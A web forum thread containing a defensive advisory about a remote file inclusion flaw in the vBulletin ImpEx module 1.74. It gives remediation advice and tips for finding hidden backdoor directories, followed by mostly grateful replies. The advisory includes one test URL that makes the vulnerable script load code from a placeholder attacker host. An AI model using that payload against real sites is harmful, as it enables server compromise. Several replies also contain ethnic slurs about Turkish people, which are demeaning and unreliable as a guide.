|
ALERT for all Forum owners running vBulletin.
SplitInfinity Here letting you know that....
There is a known Turkish hacker group targeting the adult industry. The vBulletin ImpEX module contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to ImpExData.php not properly sanitizing user input supplied to the 'systempath' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script. First, you should immediately block this class C: ipchains -A input -j REJECT -s 85.107.191.0/24 -d 0/0 -p all For some reason, they keep using the same ips. Lame hackers. :-) I have tracked them down and done some stuff to stop them from what they are doing.... however you should be warned that if you run vBulletin they will be hitting you soon! So far they have taken out over 10,000 sites as reported on securityfocus. Vulnerability Classification: * Remote/Network Access Required * Input Manipulation * Loss Of Integrity * Exploit Available * Verified * Web Related Products: * vBulletin ImpEx Module 1.74 ( http://www.vbulletin.com/docs/html/impex ) Solution: Upgrade to version 1.75 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds. Manual Testing Notes: http://[target]/impex/ImpExData.php?systempath=http://[attacker]/evil.txt? Where the hackers play... http://www.sanalinfaz.com/forumm/sho...=6140#post6140 They will use the exploit to install mech, eggdrops, backdoors to your server and more. I list below some common places they plant their files.... Places to check: /tmp /var/tmp/ /var/tmp/ssh /var/tmp/root /var/tmp/ Look for a file simply named "a" it is a backdoor. That list is NOT all inclusive as different groups will run different root kits for the same exploit.... Look for hidden directories by hitting TAB. Example: ls -la total 20 drwxr-xr-x 3 apache apache 4096 Apr 22 03:58 drwxrwxrwt 3 root root 4096 May 13 13:20 . drwxr-xr-x 24 root root 4096 Jan 29 20:50 .. Notice the seemingly empty one on top? If it type: cd [TAB] I get this: cd \ /multi/ They used control characters to hide the name of the directory. It becomes exposed when tab completion has a go at it. They basically named the directory " " space... :-) So, I cd into cd \ /multi/ and voila, all the rootkits and irc shit they run is in there. :-) total 1360 drwxr-xr-x 4 apache apache 4096 Apr 23 00:00 . drwxr-xr-x 3 apache apache 4096 Apr 22 03:58 .. -rw-r--r-- 1 apache apache 454 Apr 24 07:08 `2Skeletzi.seen -rw-r--r-- 1 apache apache 143 Apr 24 07:08 `50Cent.seen -rw-r--r-- 1 apache apache 647 Apr 24 07:08 `50Centz.seen -rw-r--r-- 1 apache apache 887 Apr 24 07:08 `5OCentz.seen -rwxr-xr-x 1 apache apache 12 Dec 26 01:51 acycmech -rw-r--r-- 1 apache apache 1163 Apr 24 07:08 Adriana``.seen -rw-r--r-- 1 apache apache 527 Apr 24 07:08 Alexandreta.seen -rw-r--r-- 1 apache apache 712 Apr 24 07:08 Al`Quaida.seen -rw-r--r-- 1 apache apache 452 Apr 24 07:08 A-Tentat`.seen -rw-r--r-- 1 apache apache 435 Apr 24 07:08 Aurora.seen -rw-r--r-- 1 apache apache 234 Apr 24 07:08 BadBoy^.seen -rw-r--r-- 1 apache apache 276 Apr 24 07:08 BaxDeCd`ie.seen -rw-r--r-- 1 apache apache 941 Apr 24 07:08 B`Nicolita.seen -rw-r--r-- 1 apache apache 878 Apr 24 07:08 Boxe.seen -rw-r--r-- 1 apache apache 363 Apr 24 07:08 BUG`Mafia.seen -rw-r--r-- 1 apache apache 842 Apr 24 07:08 C0Sty.seen -rw-r--r-- 1 apache apache 620 Apr 24 07:08 CaracalCity.seen -rw-r--r-- 1 apache apache 799 Apr 24 07:08 caracalmwe.seen -rw-r--r-- 1 apache apache 339 Apr 24 07:08 CaracalTown.seen -rw-r--r-- 1 apache apache 1019 Apr 24 07:08 CartieruHCC.seen -rw-r--r-- 1 apache apache 692 Apr 24 07:08 CartierulHCC.seen -rw-r--r-- 1 apache apache 581 Apr 24 07:08 CartziDeJoc.seen Etc.... the list goes on |
Thanks for the heads up!
|
darn Turkish hackers :mad:
they want my sig now? :smokin |
hence proving my point chris is by far the whitest cracker here :thumbsup good find dude
|
Thanks.
My opinion is that by sharing the info I find, I help secure everyone, not just my customers. However, it does put my customers in a good place, dont it? :-) Love ya all... |
Thank you very much!!
|
Bump, if only to piss off the turkish hackers.
|
Here's a bump for TD
|
thanks for the update :thumbsup
|
Sounds like those Ottoman Empire hackers, they arenhahaha8217;t just hacking the adult industry its all western sites, propaganda saying u attack our homes blah blah we attack your websites
|
will this hack work on windows servers?
|
thx for the headsup
|
Quote:
That's the vBulletin ImpEx Module version 1.74. It's in vBulletin 3.5 (don't know what earlier versions it's also in or if they are susceptible). |
turkish people who don't like porn... hmm... is there anything they like, other than ugly women and hashish?
|
Rofl. Good work. You're only like 3 months too late. All that was supposed to be hacked was already hacked by now.
|
going to work on that soon, thx for the heads u[
|
going to work on that soon, thx for the heads up
|
Nice geek detective work. I'm impressed.
|
with a properly secured server it should be impossible to own a site with this exploit... :2 cents:
|
just hell with turkish hacker, they even don't know english
|
Quote:
|
Cyber Jihad!!!
|
Woj, not everyone has a properly secured server because the programs they run have unknown exploits, that BECOME exploits after they are discovered.
|
Ah, Thanks for the heads up!
|
great heads up :)
|
Thanks for the info!! :)
|
I want my GFY Money for nothin' and pics for free. |
Quote:
|
Thanks for heads up!
|
| All times are GMT -7. The time now is 09:05 AM. |
Powered by vBulletin® Version 3.8.8
Copyright ©2000 - 2025, vBulletin Solutions, Inc.
©2000-, AI Media Network Inc123